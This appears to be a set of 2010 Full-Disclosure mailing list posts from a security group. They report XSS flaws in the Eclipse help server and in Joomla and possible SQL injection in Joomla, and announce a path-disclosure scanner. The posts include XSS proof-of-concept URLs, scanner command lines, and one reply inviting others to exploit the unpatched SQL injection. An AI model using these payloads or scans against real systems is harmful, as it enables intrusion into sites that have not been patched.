http://secunia.com/
[Full-disclosure] Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability
= Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability = 1. OVERVIEW The Help Content web application of Eclipse IDE was vulnerable to Cross Site Scripting (XSS) Vulnerability. 2. PRODUCT DESCRIPTION Eclipse is a multi-language software development environment comprising an integrated development environment (IDE) and an extensible plug-in system. It is written mostly in Java and can be used to develop applications in Java and, by means of various plug-ins, other programming languages including Ada, C, C++, COBOL, Perl, PHP, Python, Ruby (including Ruby on Rails framework), Scala, and Scheme. The IDE is often called Eclipse ADT for Ada, Eclipse CDT for C/C++, Eclipse JDT for Java, and Eclipse PDT for PHP. 3. VULNERABILITY DESCRIPTION Eclipse Help Contents are served as a web application via the built-in Jetty Web Server plugin. Cross Site Scripting vulnerabilities were found in /help/index.jsp and /help/advanced/content.jsp URLs. XSS on /help/advanced/content.jsp url makes the browser hang but even after clicking Stop Executing button, users can still get XSS. 4. VERSIONS AFFECTED Eclipse IDE Version: 3.6.1 = Tested Editions(SDK, Java, J2EE) 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost:[REPLACE]/help/index.jsp?'onload='alert(0) http://localhost:[REPLACE]/help/advanced/content.jsp?'onload='alert(0) 6. IMPACT In a situation where users' browser security settings are weak, the localized XSS vector could enable attackers to perform a number of black acts including cross site content access, smb shares enumeration, remote code execution, malicious trojan downloading and execution ...etc. 7. SOLUTION Apply the recent error-free nightly builds (ie. http://download.eclipse.org/eclipse/downloads/drops/N20101110-2000/index.php) . According to the developer, Chris Goldthorpe, the fix is in the nightly build, http://download.eclipse.org/eclipse/downloads/drops/N20101108-2000/index.php , it will also be in 3.6.2 (February 2011) and 3.7 (June 2011). 8. VENDOR Eclipse Developers Team http://www.eclipse.org/ 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2010-11-04 : vulnerability discovered 2010-11-05 : notified vendor 2010-11-08 : patch released and applied to svn 2010-11-16 : vulnerability disclosed 11. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/eclipse/[eclipse_help_server]_cross_site_scripting Eclipse Bug Tracker: https://bugs.eclipse.org/bugs/show_bug.cgi?id=329582 Previous XSS Flaws: http://r00tin.blogspot.com/2008/04/eclipse-local-web-server-exploitation.html (searchView.jsp, workingSetManager.jsp) Cross Environment Hopping: http://blog.watchfire.com/wfblog/2008/06/cross-environ-1.html About Eclipse IDE: https://secure.wikimedia.org/wikipedia/en/wiki/Eclipse_%28software%29 #yehg [2010-11-16] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws
This public disclosure has achieved its aim. Joomla! Team finally patched this hole. http://developer.joomla.org/security/news/9-security/10-core-security/323-20101101-core-sqli-info-disclosurevulnerabilities.html Upgrade to the latest Joomla! version (1.5.22 or later). 1. VULNERABILITY DESCRIPTION Potential SQL Injection Flaws were detected Joomla! CMS version 1.5.20. These flaws were reported along with our Cross Scripting Flaw which was fixed in 1.5.21. Developers believed that our reported SQL Injection flaws are not fully exploitable because of Joomla! built-in string filters and were not fixed in 1.5.21 which is currently the latest version. As a result, we disclosed these flaws in order for someone who can exploit these flaws to the next maximum level. 2. PROOF-OF-CONCEPT/EXPLOIT http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg 3. DISCLOSURE TIME-LINE 2010-10-06 : Notified Joomla! Security Strike Team 2010-11-01 : Vulnerability disclosed 2010-11-05 : Patched version (1.5.22) released 4. VENDOR Joomla! Developer Team http://www.joomla.org http://www.joomla.org/download.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws
1. VULNERABILITY DESCRIPTION Potential SQL Injection Flaws were detected Joomla! CMS version 1.5.20. These flaws were reported along with our Cross Scripting Flaw which was fixed in 1.5.21. Developers believed that our reported SQL Injection flaws are not fully exploitable because of Joomla! built-in string filters and were not fixed in 1.5.21 which is currently the latest version. As a result, we disclosed these flaws in order for someone who can exploit these flaws to the next maximum level. 2. PROOF-OF-CONCEPT/EXPLOIT http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg 3. DISCLOSURE TIME-LINE 2010-10-06 : Notified Joomla! Security Strike Team 2010-11-01 : Vulnerability disclosed 4. VENDOR Joomla! Developer Team http://www.joomla.org http://www.joomla.org/download.html # YGN Ethical Hacker Group # http://yehg.net # 2010-11-1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws
To clarify, we want excellent guys here to prove/bypass/exploit the potential issues to enforce developers to fix rather than hiding these issues. That's what we want to say. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Tool Update Announcement] inspathx
Check the update via svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx Info about inspathx http://inspathx.googlecode.com/ Change Log: -Added username and server path display in console and log output that looks like I, [2010-10-14 02:10:08 pid:#6848] INFO -- : ! Username detected = [victim] I, [2010-10-14 02:10:08 pid:#6848] INFO -- : ! Server path extracted = [/home/victim/htdocs/] -Added language support -Modified x argument that accepts each extension separated by comma(s) (default : php4,php5,php6,php,asp,aspx,jsp,jspx) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.5.20 = Cross Site Scripting (XSS) Vulnerability
1. OVERVIEW
The Joomla! web application was vulnerable to Cross Site Scripting
vulnerability.
2. PRODUCT DESCRIPTION
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
3. VULNERABILITY DESCRIPTION
Some URLs in Joomla! do not properly escape encoded user inputs that
lead to cross site scripting vulnerability.
For more information about this kind of vulnerability, see OWASP Top
10 - A2, WASC-8 and
CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting').
4. VERSIONS AFFECTED
Joomla! 1.5.20 and lower
5. PROOF-OF-CONCEPT/EXPLOIT
http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/
6. IMPACT
Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.
7. SOLUTION
Upgrade to Joomla! 1.5.21
8. VENDOR
Joomla! Developer Team
http://www.joomla.org
9. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
10. DISCLOSURE TIME-LINE
2010-10-04: vulnerability discovered
2010-10-06: notified vendor
2010-10-09: vendor released fix
2010-10-09: vulnerability disclosed
11. REFERENCES
Vendor Advisory URL:
http://developer.joomla.org/security/news/9-security/10-core-security/322-20101001-core-xss-vulnerabilities.html
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS)
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Tool Update Announcement] inspathx - Path Disclosure Finder
UPDATE Check it out at svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx-read-only For those who don't know inspathx https://code.google.com/p/inspathx/ _ WHAT¶ A tool that uses local source tree to make requests to the url and search for path inclusion error messages. It's ever a common problem in PHP web applications that we're hating to see for ever. We hope this tool triggers no path disclosure flaws any more. See our article about path disclosure. http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt WHY¶ Web application developers sometimes fail to add safe checks against authentications, file inclusion ..etc are prone to reveal possible sensitive information when those applications' URLs are directly requested. Sometimes, it's a clue to File Inclusion vulnerability. For open-source applications, source code can be downloaded and checked to find such information. This script will do this job. 1. First you have to download source archived file of your desired OSS. 2. Second, extract it. 3. Third, feed its path to inspath The inspath takes * -d or --dir argument as source directory (of application) * -u or --url arguement as the target base URL (like http://victim.com) * -t or --threads argument as the number of threads concurrently to run (default is 10) * -l argument as your desired language php,asp,aspx,jsp,all? (default is all) * -x argument as your desired extensions separated with | character (default : php4|php5|php6|php|asp|aspx|jsp|jspx) - make sure to enclose multiple extensions with double quotes - See Examples Read the related text: http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt Similar terms: Full Path Disclosure, Internal Path Leakage SUPPORTED LANGUAGES¶ * PHP * ASP(X) * JSP(X) HOW¶ ruby inspathx.rb -d /sources/phpmyadmin -u http://localhost/phpmyadmin -t 20 ruby inspathx.rb -d c:/sources/phpmyadmin -u http://localhost/phpmyadmin -t 20 ruby inspathx.rb -d c:/sources/dotnetnuke -u http://localhost/dotnetnuke -t 20 -l aspx ruby inspathx.rb -d c:/sources/jspnuke -u http://localhost/jspnuke -t 20 -l jsp -x jsp|jspx SAMPLE LOGS¶ Mambo 4.6.5 http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_mambo_.log WordPress 3.0.1 http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_wp_.log REFERENCES¶ http://www.owasp.org/index.php/Full_Path_Disclosure http://projects.webappsec.org/Information-Leakage http://cwe.mitre.org/data/definitions/209.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [New Tool Announcement] inspath - Path Disclosure Finder
WHAT¶ A tool that uses local source tree to make requests to the url and search for path inclusion error messages. It's ever a common problem in PHP web applications that we're hating to see for ever. We hope this tool triggers no path disclosure flaws any more. See our article about path disclosure. http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt WHY¶ PHP Web application developers sometimes fail to add safe checks against authentications, file inclusion ..etc are prone to reveal possible sensitive information when those applications' URLs are directly requested. Sometimes, it's a clue to Local File Inclusion vulnerability. For open-source applications, source code can be downloaded and checked to find such information. This script will do this job. 1. First you have to download source archived file of your desired OSS. 2. Second, extract it. 3. Third, feed its path to inspath The inspath takes * -d or --dir argument as source directory (of application) * -u or --url arguement as the target base URL (like http://victim.com) * -t or --threads argument as the number of threads concurrently to run (default is 10) Read the related text: http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt See the sample scan logs of latest mambo and wordpress applications: http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_mambo_.log http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_wp_.log Similar terms: Full Path Dislosure, Internal Path Leakage HOW¶ ruby inspath.rb -d /sources/phpmyadmin -u http://localhost/phpmyadmin -t 20 ruby inspath.rb -d c:/sources/phpmyadmin -u http://localhost/phpmyadmin -t 20 DOWNLOAD¶ We love svn. Check it out at svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx-read-only REFERENCES¶ http://www.owasp.org/index.php/Full_Path_Disclosure http://projects.webappsec.org/Information-Leakage http://cwe.mitre.org/data/definitions/209.html Use portable bash versions if you wish: http://www.pentesterscripting.com/discovery/web_requester http://www.pentesterscripting.com/exploitation/bash_web_parameter_fuzzer - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
